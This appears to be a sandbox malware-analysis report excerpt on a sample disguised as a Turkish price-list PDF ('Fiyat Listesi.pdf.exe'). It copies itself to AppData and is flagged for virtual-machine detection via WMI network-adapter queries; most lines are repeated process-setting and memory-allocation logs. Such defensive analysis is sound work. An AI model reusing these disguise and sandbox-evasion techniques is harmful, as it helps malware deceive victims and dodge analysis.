                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 8136, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
